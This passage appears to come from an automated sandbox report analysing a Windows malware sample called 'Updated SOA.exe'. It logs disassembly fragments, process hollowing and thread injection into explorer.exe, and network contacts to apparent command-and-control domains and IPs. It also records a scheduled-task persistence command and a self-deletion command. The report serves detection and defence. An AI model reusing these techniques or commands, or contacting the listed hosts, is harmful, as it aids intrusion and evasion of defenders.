          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440AC7B mov eax, dword ptr fs:[00000030h]18_2_0440AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A740D mov eax, dword ptr fs:[00000030h]18_2_044A740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A740D mov eax, dword ptr fs:[00000030h]18_2_044A740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A740D mov eax, dword ptr fs:[00000030h]18_2_044A740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04491C06 mov eax, dword ptr fs:[00000030h]18_2_04491C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456C0A mov eax, dword ptr fs:[00000030h]18_2_04456C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456C0A mov eax, dword ptr fs:[00000030h]18_2_04456C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456C0A mov eax, dword ptr fs:[00000030h]18_2_04456C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456C0A mov eax, dword ptr fs:[00000030h]18_2_04456C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043F746D mov eax, dword ptr fs:[00000030h]18_2_043F746D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440BC2C mov eax, dword ptr fs:[00000030h]18_2_0440BC2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A8CD6 mov eax, dword ptr fs:[00000030h]18_2_044A8CD6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E849B mov eax, dword ptr fs:[00000030h]18_2_043E849B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044914FB mov eax, dword ptr fs:[00000030h]18_2_044914FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456CF0 mov eax, dword ptr fs:[00000030h]18_2_04456CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456CF0 mov eax, dword ptr fs:[00000030h]18_2_04456CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456CF0 mov eax, dword ptr fs:[00000030h]18_2_04456CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494496 mov eax, dword ptr fs:[00000030h]18_2_04494496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04413D43 mov eax, dword ptr fs:[00000030h]18_2_04413D43
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04453540 mov eax, dword ptr fs:[00000030h]18_2_04453540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04483D40 mov eax, dword ptr fs:[00000030h]18_2_04483D40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043E3D34 mov eax, dword ptr fs:[00000030h]18_2_043E3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043DAD30 mov eax, dword ptr fs:[00000030h]18_2_043DAD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043FC577 mov eax, dword ptr fs:[00000030h]18_2_043FC577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043FC577 mov eax, dword ptr fs:[00000030h]18_2_043FC577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043F7D50 mov eax, dword ptr fs:[00000030h]18_2_043F7D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449E539 mov eax, dword ptr fs:[00000030h]18_2_0449E539
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0445A537 mov eax, dword ptr fs:[00000030h]18_2_0445A537
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04404D3B mov eax, dword ptr fs:[00000030h]18_2_04404D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04404D3B mov eax, dword ptr fs:[00000030h]18_2_04404D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04404D3B mov eax, dword ptr fs:[00000030h]18_2_04404D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A8D34 mov eax, dword ptr fs:[00000030h]18_2_044A8D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456DC9 mov eax, dword ptr fs:[00000030h]18_2_04456DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456DC9 mov eax, dword ptr fs:[00000030h]18_2_04456DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456DC9 mov eax, dword ptr fs:[00000030h]18_2_04456DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456DC9 mov ecx, dword ptr fs:[00000030h]18_2_04456DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456DC9 mov eax, dword ptr fs:[00000030h]18_2_04456DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04456DC9 mov eax, dword ptr fs:[00000030h]18_2_04456DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449FDE2 mov eax, dword ptr fs:[00000030h]18_2_0449FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449FDE2 mov eax, dword ptr fs:[00000030h]18_2_0449FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449FDE2 mov eax, dword ptr fs:[00000030h]18_2_0449FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449FDE2 mov eax, dword ptr fs:[00000030h]18_2_0449FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043D2D8A mov eax, dword ptr fs:[00000030h]18_2_043D2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043D2D8A mov eax, dword ptr fs:[00000030h]18_2_043D2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043D2D8A mov eax, dword ptr fs:[00000030h]18_2_043D2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043D2D8A mov eax, dword ptr fs:[00000030h]18_2_043D2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043D2D8A mov eax, dword ptr fs:[00000030h]18_2_043D2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04488DF1 mov eax, dword ptr fs:[00000030h]18_2_04488DF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04402581 mov eax, dword ptr fs:[00000030h]18_2_04402581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04402581 mov eax, dword ptr fs:[00000030h]18_2_04402581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04402581 mov eax, dword ptr fs:[00000030h]18_2_04402581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04402581 mov eax, dword ptr fs:[00000030h]18_2_04402581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04492D82 mov eax, dword ptr fs:[00000030h]18_2_04492D82
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04492D82 mov eax, dword ptr fs:[00000030h]18_2_04492D82
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04492D82 mov eax, dword ptr fs:[00000030h]18_2_04492D82
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04492D82 mov eax, dword ptr fs:[00000030h]18_2_04492D82
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04492D82 mov eax, dword ptr fs:[00000030h]18_2_04492D82
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00409B50 LdrLoadDll,7_2_00409B50
          Source: C:\Users\user\Desktop\Updated SOA.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.starsspell.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.2.184 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sunshinefamilysupport.com
          Source: C:\Windows\explorer.exeNetwork Connect: 70.40.216.229 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thesewhitevvalls.com
          Source: C:\Windows\explorer.exeDomain query: www.loccssol.store
          Source: C:\Windows\explorer.exeNetwork Connect: 23.92.26.10 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.carts-amazon.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.12 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.emilfaucets.com
          Source: C:\Windows\explorer.exeDomain query: www.invetorsbank.com
          Source: C:\Windows\explorer.exeDomain query: www.kutahyaescortbayanlarim.xyz
          Source: C:\Windows\explorer.exeDomain query: www.brightlifeprochoice.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.33.94.22 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.169.11 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Updated SOA.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: DF0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Updated SOA.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Updated SOA.exeMemory written: C:\Users\user\Desktop\Updated SOA.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Updated SOA.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Updated SOA.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess created: C:\Users\user\Desktop\Updated SOA.exe C:\Users\user\Desktop\Updated SOA.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Updated SOA.exe'Jump to behavior
          Source: explorer.exe, 00000008.00000000.243141131.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000008.00000000.272559658.0000000001980000.00000002.00020000.sdmp, cmmon32.exe, 00000012.00000002.485586426.0000000002E00000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.272559658.0000000001980000.00000002.00020000.sdmp, cmmon32.exe, 00000012.00000002.485586426.0000000002E00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.272559658.0000000001980000.00000002.00020000.sdmp, cmmon32.exe, 00000012.00000002.485586426.0000000002E00000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.272559658.0000000001980000.00000002.00020000.sdmp, cmmon32.exe, 00000012.00000002.485586426.0000000002E00000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Users\user\Desktop\Updated SOA.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
